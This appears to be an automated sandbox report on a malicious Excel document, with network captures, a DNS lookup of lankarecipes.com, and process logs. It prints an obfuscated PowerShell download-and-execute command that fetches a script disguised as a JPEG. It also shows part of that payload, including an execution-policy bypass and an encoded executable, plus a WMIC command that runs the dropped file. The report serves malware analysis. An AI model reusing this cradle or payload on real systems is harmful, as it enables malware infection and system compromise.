Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                      Jan 8, 2021 09:40:25.455214024 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455229044 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455233097 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.455245018 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455260992 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455264091 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.455276012 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455291986 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455297947 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.455307961 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455327034 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.455327988 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455383062 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.640362978 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640396118 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640413046 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640428066 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640446901 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640455961 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.640477896 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640496969 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640496969 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.640512943 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640528917 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640548944 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640548944 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.640567064 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640578985 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.640584946 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640604019 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640611887 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.640624046 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640641928 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.640645027 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640666008 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640686035 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640686989 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.640703917 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640718937 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640721083 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.640736103 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640753031 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640753031 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.640768051 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640784025 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640790939 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.640799999 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640819073 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640836954 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640845060 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.640851974 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640868902 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640885115 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640892029 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.640899897 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640923977 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640924931 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.640940905 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640957117 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640975952 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.640976906 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640994072 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.641001940 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.641011000 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.641027927 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.641036034 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.641042948 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.641058922 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.641066074 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.641074896 CET8049731192.185.236.165192.168.2.3

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 8, 2021 09:40:24.589523077 CET | 192.168.2.3 | 8.8.8.8 | 0x3d62 | Standard query (0) | lankarecipes.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 8, 2021 09:40:24.778623104 CET | 8.8.8.8 | 192.168.2.3 | 0x3d62 | No error (0) | lankarecipes.com | (none) | 192.185.236.165 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• lankarecipes.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49731 | 192.185.236.165 | 80 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp | kBytes transferred | Direction | Data
Jan 8, 2021 09:40:25.081321955 CET | 1269 | OUT | GET /Sparc.jpg HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
    Host: lankarecipes.com
    Connection: Keep-Alive
Jan 8, 2021 09:40:25.271898031 CET | 1270 | IN | HTTP/1.1 200 OK
    Date: Fri, 08 Jan 2021 08:40:25 GMT
    Server: Apache
    Upgrade: h2,h2c
    Connection: Upgrade, Keep-Alive
                                                                                                                                                      Last-Modified: Wed, 06 Jan 2021 16:45:57 GMT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      Content-Length: 2326467
                                                                                                                                                      Keep-Alive: timeout=5, max=75
                                                                                                                                                      Content-Type: image/jpeg
                                                                                                                                                      Data Raw: 20 53 45 74 2d 45 78 45 63 55 74 69 4f 6e 50 4f 6c 49 63 59 20 62 59 70 61 73 53 20 2d 73 43 6f 50 65 20 70 52 4f 43 45 53 73 20 2d 46 4f 72 63 45 20 3b 20 24 6b 76 45 53 6e 65 75 6d 54 62 72 74 20 3d 20 27 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 30 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 41 33 59 73 54 61 63 77 4f 71 69 58 4d 44 71 6f 6c 7a 41 36 71 4a 38 42 2b 6b 69 58 49 44 71 6f 6c 46 4a 61 65 4a 63 67 4f 71 69 54 77 68 6f 34 6c 32 41 36 71 4a 63 77 4f 71 69 58 45 44 71 6f 6c 53 61 57 4e 6f 63 77 4f 71 69 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 46 42 46 41 41 42 4d 41 51 55 41 74 75 6a 31 58 77 41 41 41 41 41 41 41 41 41 41 34 41 41 4f 41 51 73 42 42 67 41 41 63 42 6b 41 41 46 41 41 41 41 41 41 41 41 41 63 45 67 41 41 41 42 41 41 41 41 43 41 47 51 41 41 41 45 41 41 41 42 41 41 41 41 41 51 41 41 41 45 41 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 4f 41 5a 41 41 41 51 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 41 45 41 41 41 45 41 41 41 41 41 41 51 41 41 41 51 41 41 41 41 41 41 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 54 49 4d 5a 41 46 41 41 41 41 41 41 73 42 6b 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 42 6b 41 2f 41 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 41 47 51 42 30 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 4c 6e 52 6c 65 48 51 41 41 41 42 45 59 42 6b 41 41 42 41 41 41 41 42 77 47 51 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 41 59 43 35 79 5a 47 46 30 59 51 41 41 2f 41 6b 41 41 41 43 41 47 51 41 41 45 41 41 41 41 49 41 5a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 41 45 41 75 5a 47 46 30 59 51 41 41 41 45 67 56 41 41 41 41 6b 42 6b 41 41 42 41 41 41 41 43 51 47 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 41 41 41 44 41 4c 6e 4a 7a 63 6d 4d 41 41 41 41 51 41 41 41 41 41 4c 41 5a 41 41 41 51 41 41 41 41 6f 42 6b 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 41 41 41 51 43 35 79 5a 57 78 76 59 77 41 41 61 68 6b 41 41 41 44 41 47 51 41 41 49 41 41 41 41 4c 41 5a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 41 45 49 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
Data Ascii: SEt-ExEcUtiOnPOlIcY bYpasS -sCoPe pROCESs -FOrcE ; $kvESneumTbrt = '

Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 09:39:52
Start date: 08/01/2021
Path: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase: 0x11a0000
File size: 27110184 bytes
MD5 hash: 5D6638F2C8F8571C593999C58866007E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:39:56
Start date: 08/01/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd.eXE /c PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
Imagebase: 0xbd0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:39:57
Start date: 08/01/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:39:57
Start date: 08/01/2021
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))
Imagebase: 0x1270000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

General

Start time: 09:40:36
Start date: 08/01/2021
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\nwaha3c5\nwaha3c5.cmdline'
Imagebase: 0xa30000
File size: 2170976 bytes
MD5 hash: 350C52F71BDED7B99668585C15D70EEA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: moderate

General

Start time: 09:40:40
Start date: 08/01/2021
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESBD2F.tmp' 'c:\Users\user\AppData\Local\Temp\nwaha3c5\CSCEA75873C5D80459DA0D513336FABE338.TMP'
Imagebase: 0x140000
File size: 43176 bytes
MD5 hash: C09985AE74F0882F208D75DE27770DFA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 09:40:44
Start date: 08/01/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\system32\cmd.exe' /C COPy /B %TEMP%\Test1.txt + %TEMP%\Test2.gif %TEMP%\Test3.jpg
Imagebase: 0xbd0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:40:44
Start date: 08/01/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\system32\cmd.exe' /C WmIC PRocESs CAlL cREAtE %TEMP%\Test3.jpg
Imagebase: 0xbd0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:40:45
Start date: 08/01/2021
Path: C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit): true
Commandline: WmIC PRocESs CAlL cREAtE C:\Users\user\AppData\Local\Temp\Test3.jpg
Imagebase: 0xfe0000
File size: 391680 bytes
MD5 hash: 79A01FCD1C8166C5642F37D1E0FB7BA8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 09:40:46
Start date: 08/01/2021
Path: C:\Users\user\AppData\Local\Temp\Test3.jpg
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\Test3.jpg
Imagebase: 0x400000
File size: 1744221 bytes
MD5 hash: 19387B30D6DBE83E31D3CAC884280D93
Has elevated privileges: true
Has administrator privileges: true
Programmed in: Visual Basic
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
Reputation: low

General

Start time: 09:40:54
Start date: 08/01/2021
Path: C:\Users\user\AppData\Local\Temp\Test3.jpg
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\Test3.jpg
Imagebase: 0x400000
File size: 1744221 bytes
MD5 hash: 19387B30D6DBE83E31D3CAC884280D93
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                                                                                      Reputation:low

                                                                                                                                                      Disassembly

                                                                                                                                                      Code Analysis
